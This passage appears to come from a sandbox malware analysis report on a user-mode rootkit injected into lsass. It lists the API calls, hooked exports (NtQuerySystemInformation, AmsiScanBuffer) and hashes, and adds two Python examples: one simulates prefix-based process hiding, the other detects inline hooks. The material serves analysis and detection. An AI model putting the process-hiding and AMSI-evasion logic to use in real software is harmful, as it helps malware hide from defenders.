                                                    • Part of subcall function 0000017D2DD535C8: GetProcessHeap.KERNEL32(?,?,?,?,?,0000017D2DD524D1), ref: 0000017D2DD535EB
                                                    • Part of subcall function 0000017D2DD535C8: HeapAlloc.KERNEL32(?,?,?,?,?,0000017D2DD524D1), ref: 0000017D2DD535FE
                                                    • Part of subcall function 0000017D2DD535C8: StrCmpNIW.SHLWAPI(?,?,?,?,?,0000017D2DD524D1), ref: 0000017D2DD53673
                                                    • Part of subcall function 0000017D2DD535C8: GetProcessHeap.KERNEL32(?,?,?,?,?,0000017D2DD524D1), ref: 0000017D2DD536D9
                                                    • Part of subcall function 0000017D2DD535C8: HeapFree.KERNEL32(?,?,?,?,?,0000017D2DD524D1), ref: 0000017D2DD536E7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
• Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFreeInformationQuerySystem
                                                  • String ID: $nya-$S
                                                  • API String ID: 722747020-3492252248
                                                  • Opcode ID: 4ac77b2c6d0e63e88a47bc1c42b4b05fc6ca31a13af142bc6dc0eee490c53e66
                                                  • Instruction ID: 850f05bd11e511c281c5463248047073372b965f77c52c85919e52c47a673e3b
                                                  • Opcode Fuzzy Hash: 4ac77b2c6d0e63e88a47bc1c42b4b05fc6ca31a13af142bc6dc0eee490c53e66
                                                  • Instruction Fuzzy Hash: ED519032A18F6886F760CB65A4807ED6BB8FB65788F08C415DE4D56B46DBB9C8C6C340
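The record above pairs NtQuerySystemInformation with a case-insensitive StrCmpNIW and the string "$nya-": the shape of a SystemProcessInformation hook that drops every entry whose image name carries a chosen prefix, which is how the process hiding reported for this sample would be implemented. The Python below is an added example, not code from the sample or from Joe Sandbox. It models the returned SYSTEM_PROCESS_INFORMATION buffer with the x64 layout (NextEntryOffset at offset 0, NumberOfThreads at 4, ImageName at 0x38, UniqueProcessId at 0x50; a 0x100-byte header followed by 0x50-byte thread records and then the image name), applies the prefix unlink the way such a hook does it after the real call returns, and shows two checks: a cross-view diff against an independently obtained PID list, and a scan of the returned bytes for entries that are still present but no longer linked. The process names, PIDs and thread counts are constructed; the assumption that the image name follows the thread array with 8-byte alignment is what the orphan scan relies on.

```python
"""Process hiding through a hooked NtQuerySystemInformation, modelled, plus two checks.

Added example; not code from the analysed sample or from Joe Sandbox. Layout
constants are the x64 SYSTEM_PROCESS_INFORMATION offsets; the process names,
PIDs and thread counts are constructed.
"""
import struct

HDR = 0x100      # sizeof(SYSTEM_PROCESS_INFORMATION), x64
THREAD = 0x50    # sizeof(SYSTEM_THREAD_INFORMATION), x64
OFF_NAME = 0x38  # ImageName (UNICODE_STRING: Length, MaximumLength, pad, Buffer)
OFF_PID = 0x50   # UniqueProcessId

SAMPLE_PROCS = [(4, "System", 150), (748, "lsass.exe", 10), (4120, "$nya-agent.exe", 3),
                (5204, "explorer.exe", 60), (6000, "$NYA-svc.exe", 2)]   # constructed


def _entry(buf, off):
    """Decode one entry: (NextEntryOffset, NumberOfThreads, MaximumLength, pid, name)."""
    nxt, nthreads = struct.unpack_from("<II", buf, off)
    length, maxlen, _, ptr = struct.unpack_from("<HHIQ", buf, off + OFF_NAME)
    pid, = struct.unpack_from("<Q", buf, off + OFF_PID)
    return nxt, nthreads, maxlen, pid, buf[ptr:ptr + length].decode("utf-16-le")


def build_buffer(procs):
    """Lay entries out as the kernel does: header, thread records, UTF-16 name, 8-aligned.
    ImageName.Buffer holds an offset from the buffer start (base address 0 assumed)."""
    out = bytearray()
    for i, (pid, name, nthreads) in enumerate(procs):
        raw = name.encode("utf-16-le")
        size = (HDR + nthreads * THREAD + len(raw) + 2 + 7) & ~7
        entry = bytearray(size)
        name_off = HDR + nthreads * THREAD
        struct.pack_into("<II", entry, 0, size if i < len(procs) - 1 else 0, nthreads)
        struct.pack_into("<HHIQ", entry, OFF_NAME, len(raw), len(raw) + 2, 0, len(out) + name_off)
        struct.pack_into("<Q", entry, OFF_PID, pid)
        entry[name_off:name_off + len(raw)] = raw
        out += entry
    return bytes(out)


def walk(buf):
    """Follow NextEntryOffset exactly as a consumer of the API would; returns [(pid, name)]."""
    off, seen = 0, []
    while True:
        nxt, _, _, pid, name = _entry(buf, off)
        seen.append((pid, name))
        if nxt == 0:
            return seen
        off += nxt


def hide_by_prefix(buf, prefix):
    """What the hook does after the real call returns: relink the chain around every
    entry whose name starts with prefix (case-insensitive, like StrCmpNIW). The bytes
    of a hidden entry stay in the buffer; only its predecessor's link changes.
    (A match on the very first entry is left alone; it has no predecessor to relink.)"""
    buf = bytearray(buf)
    prev, off = None, 0
    while True:
        nxt, _, _, _, name = _entry(buf, off)
        if prev is not None and name[:len(prefix)].lower() == prefix.lower():
            prev_nxt, = struct.unpack_from("<I", buf, prev)
            struct.pack_into("<I", buf, prev, prev_nxt + nxt if nxt else 0)
        else:
            prev = off
        if nxt == 0:
            return bytes(buf)
        off += nxt


def hidden_processes(buf, other_view):
    """Cross-view check: PIDs seen by an enumeration the hook does not cover
    (OpenProcess brute force, ETW process events, a kernel-side list) but missing here."""
    listed = {pid for pid, _ in walk(buf)}
    return sorted(pid for pid in other_view if pid not in listed)


def orphaned_entries(buf):
    """Buffer-only check: after each linked entry, the bytes up to its NextEntryOffset
    (or the end of the buffer) should hold nothing beyond alignment padding. A whole
    header fitting there is an entry that was unlinked in place."""
    found, off = [], 0
    while True:
        nxt, nthreads, maxlen, _, _ = _entry(buf, off)
        own = (HDR + nthreads * THREAD + maxlen + 7) & ~7
        end = off + nxt if nxt else len(buf)
        gap = off + own
        while gap + HDR <= end:
            g_nxt, _, _, pid, name = _entry(buf, gap)
            found.append((pid, name))
            if g_nxt == 0:
                break
            gap += g_nxt
        if nxt == 0:
            return found
        off += nxt


if __name__ == "__main__":
    clean = build_buffer(SAMPLE_PROCS)
    hooked = hide_by_prefix(clean, "$nya-")
    print("as returned by the hook:", [n for _, n in walk(hooked)])
    print("missing vs. second view:", hidden_processes(hooked, [p for p, _, _ in SAMPLE_PROCS]))
    print("still present in buffer:", orphaned_entries(hooked))
```

On a real host the second view has to come from a source the user-mode hook cannot touch: a PID sweep through OpenProcess, process-start events from ETW or Sysmon, or a kernel-side enumeration. The orphan scan only works against a hook that relinks in place; a hook that compacts the buffer defeats it, which is why the cross-view diff is the check to keep.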

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
• Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                  • API String ID: 1735320900-4225371247
                                                  • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction ID: 96f4f97e7589e417bfd216c0fa725ebf6ad4169998ba69a4a526b571fa602114
                                                  • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction Fuzzy Hash: AC5148B4518F8EA5FA00EBA9FC51BD46B30AF40744F889A53940D0656BDEB882DFC780

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
• Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProcSleep
                                                  • String ID: AmsiScanBuffer$amsi.dll
                                                  • API String ID: 188063004-3248079830
                                                  • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction ID: e07f860e85c6e67f3043271f4cb48da2854f5ab70fe7cc9399e9ad5156588ed3
                                                  • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction Fuzzy Hash: 0CD09E30659F48D5FA086F55FC543D43271BFA4B41FCC4415C60E012A6DE6C85DB83C0
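The two records above carry the export names this module resolves: AmsiScanBuffer in amsi.dll; NtQuerySystemInformation, NtQueryDirectoryFile, NtQueryDirectoryFileEx, NtEnumerateKey, NtEnumerateValueKey, NtDeviceIoControlFile and NtResumeThread in ntdll.dll; EnumServiceGroupW and EnumServicesStatusExW in advapi32.dll/sechost.dll; the two Pdh counter-array functions in pdh.dll. Together with the VirtualProtect and FlushInstructionCache calls seen elsewhere on this page, that is the set a user-mode rootkit patches to hide processes, files, registry keys and services and to blind AMSI. The Python below is an added example for checking such prologs from the defender's side; it is not code from the sample or from Joe Sandbox. Given the first bytes of an export as read from a live process (for example with ReadProcessMemory) and, where available, the same bytes from the on-disk image, it recognises the trampolines inline hooks commonly install (jmp rel32, jmp [rip+disp32], mov rax,imm64 followed by jmp rax, push imm32 followed by ret), resolves the diverted address and reports whether it falls inside a loaded module or, as with the manually mapped module this report dumped at 0000017D2DD50000, in memory backed by no image. The module map, byte strings, syscall number and addresses are constructed placeholders.

```python
"""Inline-hook check for exported function prologs (x64), from the defender's side.

Added example; not code from the analysed sample or from Joe Sandbox. The module
map, byte strings, syscall number and addresses below are constructed placeholders.
"""
import struct
from dataclasses import dataclass
from typing import Optional

MASK64 = (1 << 64) - 1
# Every x64 ntdll Nt*/Zw* stub opens with: mov r10, rcx (4C 8B D1) ; mov eax, <ssn> (B8 imm32)
SYSCALL_STUB_PREFIX = bytes.fromhex("4c8bd1b8")


@dataclass
class PrologVerdict:
    name: str
    hooked: bool
    kind: str               # matches-disk | syscall-stub | jmp-rel32 | jmp-rip-indirect | mov-rax-jmp | push-ret | mismatch | unknown
    target: Optional[int]   # where control is diverted to (for jmp-rip-indirect: the pointer slot to dereference)
    owner: Optional[str]    # module containing target; None means memory backed by no loaded image


def owner_module(addr, modules):
    """modules: sequence of (name, base, size) as read from the target's module list."""
    if addr is None:
        return None
    for name, base, size in modules:
        if base <= addr < base + size:
            return name
    return None


def classify_prolog(name, addr, code, modules, expected=None):
    """code: bytes at addr in the live process (16 are enough); expected: the same bytes
    from the on-disk image after relocation, or None for ntdll syscall stubs, whose clean
    shape is fixed."""
    if expected is not None and code.startswith(expected):
        return PrologVerdict(name, False, "matches-disk", None, None)
    if code.startswith(SYSCALL_STUB_PREFIX):
        return PrologVerdict(name, False, "syscall-stub", None, None)
    kind, target = "mismatch", None
    if code[:1] == b"\xe9" and len(code) >= 5:                    # jmp rel32 (reaches +/-2 GiB only)
        kind = "jmp-rel32"
        target = (addr + 5 + struct.unpack_from("<i", code, 1)[0]) & MASK64
    elif code[:2] == b"\xff\x25" and len(code) >= 6:              # jmp qword ptr [rip+disp32]
        kind = "jmp-rip-indirect"
        target = (addr + 6 + struct.unpack_from("<i", code, 2)[0]) & MASK64
    elif code[:2] == b"\x48\xb8" and code[10:12] == b"\xff\xe0":  # mov rax, imm64 ; jmp rax (any target)
        kind = "mov-rax-jmp"
        target = struct.unpack_from("<Q", code, 2)[0]
    elif code[:1] == b"\x68" and code[5:6] == b"\xc3":            # push imm32 ; ret (sign-extended)
        kind = "push-ret"
        target = struct.unpack_from("<i", code, 1)[0] & MASK64
    elif expected is None:
        return PrologVerdict(name, False, "unknown", None, None)  # no reference bytes, no known trampoline
    return PrologVerdict(name, True, kind, target, owner_module(target, modules))


def audit(reads, modules):
    """reads: iterable of (name, addr, live_bytes, disk_bytes_or_None); one verdict per read."""
    return [classify_prolog(n, a, live, modules, disk) for n, a, live, disk in reads]


# Constructed inputs standing in for a module list and ReadProcessMemory results.
MODULES = [("ntdll.dll", 0x7FFB12340000, 0x1F0000), ("amsi.dll", 0x7FFB0AB00000, 0x20000)]
NTQSI_ADDR, AMSI_ADDR = 0x7FFB12360000, 0x7FFB0AB05000
CLEAN_NTQSI = bytes.fromhex("4c8bd1b836000000f604250803fe7f01")   # mov r10,rcx ; mov eax,0x36 ; test ...
HOOKED_NTQSI = bytes.fromhex("48b8") + struct.pack("<Q", 0x17D2DD52300) + bytes.fromhex("ffe0") + b"\x90" * 4
AMSI_DISK = bytes.fromhex("4c8bdc49895b08")                        # stand-in for the on-disk prolog
AMSI_LIVE = b"\xe9" + struct.pack("<i", 0x1234) + AMSI_DISK[5:]    # jmp to a trampoline inside amsi.dll

if __name__ == "__main__":
    for v in audit([("NtQuerySystemInformation", NTQSI_ADDR, HOOKED_NTQSI, None),
                    ("AmsiScanBuffer", AMSI_ADDR, AMSI_LIVE, AMSI_DISK)], MODULES):
        tgt = hex(v.target) if v.target is not None else None
        print(f"{v.name}: hooked={v.hooked} kind={v.kind} target={tgt} owner={v.owner}")
```

Syscall stubs can be judged without the disk copy because their clean shape is fixed; every other export (AmsiScanBuffer, EnumServicesStatusExW, the Pdh functions) needs the on-disk bytes, relocated, for the comparison. A target in unbacked memory is the strongest signal. A target inside another signed module still deserves a look, since EDR agents and compatibility shims also hook these exports, so the verdict should be joined with the signer and load path of the owning module before anyone acts on it.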

                                                  Control-flow Graph

                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32 ref: 0000017D2DD53A35
                                                  • PathFindFileNameW.SHLWAPI ref: 0000017D2DD53A44
                                                    • Part of subcall function 0000017D2DD53F88: StrCmpNIW.SHLWAPI(?,?,?,0000017D2DD5272F), ref: 0000017D2DD53FA0
                                                    • Part of subcall function 0000017D2DD53EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,0000017D2DD53A5B), ref: 0000017D2DD53EDB
                                                    • Part of subcall function 0000017D2DD53EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000017D2DD53A5B), ref: 0000017D2DD53F0E
                                                    • Part of subcall function 0000017D2DD53EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000017D2DD53A5B), ref: 0000017D2DD53F2E
                                                    • Part of subcall function 0000017D2DD53EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000017D2DD53A5B), ref: 0000017D2DD53F47
                                                    • Part of subcall function 0000017D2DD53EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000017D2DD53A5B), ref: 0000017D2DD53F68
                                                  • CreateThread.KERNELBASE ref: 0000017D2DD53A8B
                                                    • Part of subcall function 0000017D2DD51E74: GetCurrentThread.KERNEL32 ref: 0000017D2DD51E7F
                                                    • Part of subcall function 0000017D2DD51E74: CreateThread.KERNELBASE ref: 0000017D2DD52043
                                                    • Part of subcall function 0000017D2DD51E74: TlsAlloc.KERNEL32 ref: 0000017D2DD52049
                                                    • Part of subcall function 0000017D2DD51E74: TlsAlloc.KERNEL32 ref: 0000017D2DD52055
                                                    • Part of subcall function 0000017D2DD51E74: TlsAlloc.KERNEL32 ref: 0000017D2DD52061
                                                    • Part of subcall function 0000017D2DD51E74: TlsAlloc.KERNEL32 ref: 0000017D2DD5206D
                                                    • Part of subcall function 0000017D2DD51E74: TlsAlloc.KERNEL32 ref: 0000017D2DD52079
                                                    • Part of subcall function 0000017D2DD51E74: TlsAlloc.KERNEL32 ref: 0000017D2DD52085
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
• Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                                  • String ID:
                                                  • API String ID: 2779030803-0
                                                  • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                  • Instruction ID: e2bbf7035cdc9e916597a18426b5085288f4986e6ebd83389e25a87e83549494
                                                  • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                  • Instruction Fuzzy Hash: 0C119E3161CF4983FB70A760B9493D962B0AF54345F4C0219958E811D7EFBEC4DB8640
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000003.1604607101.0000017D2DD20000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_3_17d2dd20000_lsass.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                  • Instruction ID: 6b752afb91a17aad29154e99fbe11468da530b570cc38a148516e43257cf4422
                                                  • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                  • Instruction Fuzzy Hash: 6A912472B05B5887DB608F25E509BB9B3B1FB45B94F5880299E8D0778FDA38D883C710

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 0000017D2DD51724: GetProcessHeap.KERNEL32 ref: 0000017D2DD5172F
                                                    • Part of subcall function 0000017D2DD51724: HeapAlloc.KERNEL32 ref: 0000017D2DD5173E
                                                    • Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD517AE
                                                    • Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD517DB
                                                    • Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD517F5
                                                    • Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD51815
                                                    • Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD51830
                                                    • Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD51850
                                                    • Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD5186B
                                                    • Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD5188B
                                                    • Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD518A6
                                                    • Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD518C6
                                                  • SleepEx.KERNELBASE ref: 0000017D2DD51BDF
                                                    • Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD518E1
                                                    • Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD51901
                                                    • Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD5191C
                                                    • Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD5193C
                                                    • Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD51957
                                                    • Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD51977
                                                    • Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD51992
                                                    • Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD5199C
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
• Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                                  • String ID:
                                                  • API String ID: 948135145-0
                                                  • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                  • Instruction ID: a513e6edbe1b9579d93716c2874b51edf92661d58ab9acfd5c96824e1f791f21
                                                  • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                  • Instruction Fuzzy Hash: 4731DD75208F4981FB509B26FE413F9B3B4AF44BC0F1C58219E0E8769BDEA5D8D38215

Control-flow Graph (rendered graph; basic-block list omitted). Function 17d2dd52ff0-17d2dd533a7: GetModuleHandleA at 17d2dd5308d and GetProcAddress at 17d2dd5309f; StrCmpNIW at 17d2dd530d8; lstrlenW at 17d2dd5320f and 17d2dd532b9; subcalls 17d2dd51a30, 17d2dd51cc4, 17d2dd51cfc, 17d2dd53f88 and 17d2dd63a40; a loop back to 17d2dd53124 from 17d2dd53376; exit through 17d2dd53384-17d2dd533a7.
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                  • API String ID: 2119608203-3850299575
                                                  • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction ID: f2f135d611cdf066e5d6a521eba2869d786744282965d2fc11769e0904ffb0c5
                                                  • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction Fuzzy Hash: D9B16C32218F9883EB658F65E500BE9A3B4FB45B84F485016EE8D53B96DEB5CDD2C340
APIs
Memory Dump Source
• Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
• Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
• Instruction ID: 743912c070fe1f327d28e93256d600cb52e0adf25c8753936ac792564c150e2a
• Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
• Instruction Fuzzy Hash: 1A311972209F8486EB608F60F8407EE6375FB88744F48442ADB4E47B9ADF78C589C750
APIs
Memory Dump Source
• Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
• Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
• Instruction ID: e05f22906aac1c5737550f033233ca4beb2db7fc8e70f9253c9fc50d3ade9d7f
• Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
• Instruction Fuzzy Hash: 08415B36218F8486EB60CF25F8403DE73B4FB89794F580615EA9D46B9ADF78C196CB40
APIs
Memory Dump Source
• Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
• Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
Similarity
• API ID: Find$CloseFile$FirstNext
• String ID:
• API String ID: 1164774033-0
• Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
• Instruction ID: f51d33f7841fded307b15e8a4b62ad0d3aa425269e7a372565180428a9a7dba0
• Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
• Instruction Fuzzy Hash: 99A1A532708B8989FB20DB75B8407EE6BB1EB45794F1C4115DA9D27A9ADAB8C4C3C710
Control-flow Graph (graph image not captured)
APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
• Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
